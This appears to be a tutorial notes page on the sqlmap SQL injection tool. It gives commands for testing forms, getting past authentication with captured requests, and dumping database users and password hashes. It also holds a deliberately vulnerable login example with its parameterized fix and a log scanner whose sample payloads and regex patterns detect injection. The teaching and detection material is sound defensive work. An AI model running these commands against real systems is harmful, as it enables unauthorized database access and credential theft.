Using sqlmap
This wicked tool comes with Kali and is easy to install on other Linuxes. All you need is a web form on a website as an entry point for SQL injection.
See this short “cookbook” first for quick examples of usage:
From https://securityonline.info/top-25-useful-sqlmap-commands/
Here’s the lengthy GitHub usage page:
https://github.com/sqlmapproject/sqlmap/wiki/Usage
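Before the tool notes, a reminder of what sqlmap is actually finding. This is an added example, not code from the page or from the sqlmap project: a login check written two ways against an in-memory SQLite table (constructed data). The string-built version lets a form field become part of the SQL text, which is the entry point sqlmap looks for; the parameterized version passes the same input as data and is not affected.

```python
import sqlite3


def build_db():
    """Constructed sample table with one user; not real credentials."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The form values are pasted into the SQL text, so a quote in the
    input changes the query structure (this is the bug sqlmap exploits)."""
    sql = (
        "SELECT COUNT(*) FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterized(conn, username, password):
    """Same query with bound parameters: the driver sends the input as data,
    so a quote or comment marker in a field is just characters to compare."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


if __name__ == "__main__":
    db = build_db()
    for name, fn in (("vulnerable", login_vulnerable), ("parameterized", login_parameterized)):
        ok = fn(db, "alice", "correct horse")
        tamper = fn(db, "alice' --", "wrong")   # comments out the password check
        print(f"{name:13s} correct creds: {ok}  tampered username: {tamper}")
```

The fix is the query shape, not input filtering: every place a request value reaches SQL should use bound parameters (or an ORM that does), and that is the first thing to check on a form sqlmap reports as injectable.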
Using Captured Headers to Get Past Authentication
You can attack injection points manually. If the form you need to inject into sits behind authentication, capture the request with Burp, save it to a file, and let sqlmap take the parameters (session tokens, cookies and so on) straight from that file.
You can also use the CO2 extension in Burp to pass authentication tokens:
https://security.stackexchange.com/questions/66688/login-required-before-sqlmap
sqlmap POST request injection
From https://hackertarget.com/sqlmap-post-request-injection/ :
# Parse request data and test | request data can be obtained with Burp
./sqlmap.py -r <request-file> <options>
# Fingerprint | much more information than banner
./sqlmap.py -r <request-file> --fingerprint
# Get database username, name, and hostname
./sqlmap.py -r <request-file> --current-user --current-db --hostname
# Check if user is a database admin
./sqlmap.py -r <request-file> --is-dba
# Get database users and password hashes
./sqlmap.py -r <request-file> --users --passwords
From https://github.com/sqlmapproject/sqlmap/wiki/Usage :
# Supply POST data with the --data option
python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users
# Manipulate cookies:
Options and switches: --cookie, --cookie-del, --load-cookies and --drop-set-cookie
https://github.com/sqlmapproject/sqlmap/wiki/Usage#http-cookie-header
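The other side of the commands above is spotting them in your own logs. This is an added example, not code from the page or the sqlmap project: it parses a few constructed access-log lines in the common "combined" format, URL-decodes the request path, and flags two things a defender can act on: the default sqlmap User-Agent (which starts with "sqlmap/" unless the scan was run with --random-agent, so treat it as a weak signal) and injection-shaped query strings (UNION/SELECT, time-delay functions, tautologies, quote-then-comment). The log lines, IPs and paths are constructed for the example; the pattern list is a starting point, not a complete ruleset.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache/nginx "combined" log format (not real traffic).
SAMPLE_LOG = """
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /vuln.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"
10.0.0.9 - - [10/Mar/2024:12:00:02 +0000] "GET /vuln.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
10.0.0.9 - - [10/Mar/2024:12:00:02 +0000] "GET /vuln.php?id=1%27%20AND%20SLEEP%285%29-- HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
10.0.0.9 - - [10/Mar/2024:12:00:03 +0000] "POST /login.php HTTP/1.1" 500 88 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/120.0"
10.0.0.7 - - [10/Mar/2024:12:00:04 +0000] "GET /vuln.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 200 900 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/120.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Injection-shaped fragments, matched against the URL-decoded path + query string.
SQLI_PATTERNS = [
    ("union-select", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I)),
    ("time-based", re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(", re.I)),
    ("boolean-tautology", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("quote-comment", re.compile(r"'.*(--|#|/\*)")),
]


def parse_line(line):
    """Return a dict of fields for one combined-format line, or None if it doesn't parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["decoded_path"] = unquote(entry["path"])   # payloads arrive percent-encoded
    return entry


def classify(entry):
    """List the reasons a request looks like SQL injection tooling or payloads."""
    reasons = []
    if entry["ua"].lower().startswith("sqlmap/"):
        reasons.append("sqlmap-user-agent")
    for name, pattern in SQLI_PATTERNS:
        if pattern.search(entry["decoded_path"]):
            reasons.append(name)
    return reasons


def scan(log_text):
    """Map source IP -> list of (decoded path, reasons) for every flagged request."""
    findings = {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.setdefault(entry["ip"], []).append((entry["decoded_path"], reasons))
    return findings


if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        print(f"{ip}: {len(hits)} suspicious request(s)")
        for path, reasons in hits:
            print(f"  {path}  <- {', '.join(reasons)}")
```

Note what the sample deliberately shows: the POST to /login.php is exactly the kind of request the -r usage above targets, and it is invisible here because standard access logs do not record the request body. Catching injection in POST data needs WAF or application-level logging of parameters, or at least alerting on bursts of 500s from one source.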
And here’s a good, straightforward medium-length tutorial with examples of the major operations, like database discovery, table and column enumeration, data dumps etc.:
Or try this shorter tutorial:
https://www.sqlinjection.net/sqlmap/tutorial/
Introducing JackkTutorials. This is a great YouTube channel on lots of hacking subjects, and this 15-minute video walks you through the basics:
https://www.youtube.com/watch?v=yPMbb38pwVI&t=446s
Getting Past Authentication
Finally, here’s some discussion of using sqlmap to access (from the command line or Burp or similar) pages/forms that lie behind authentication, meaning you’ll need to pass session tokens and params with your attacks:
https://medium.com/@jonaldallan/passed-ec-councils-certified-ethical-hacker-practical-20634b6f0f2
Basically, the job is to capture a request header and then use it in Burp or with
sqlmap -r headerfile.txt ...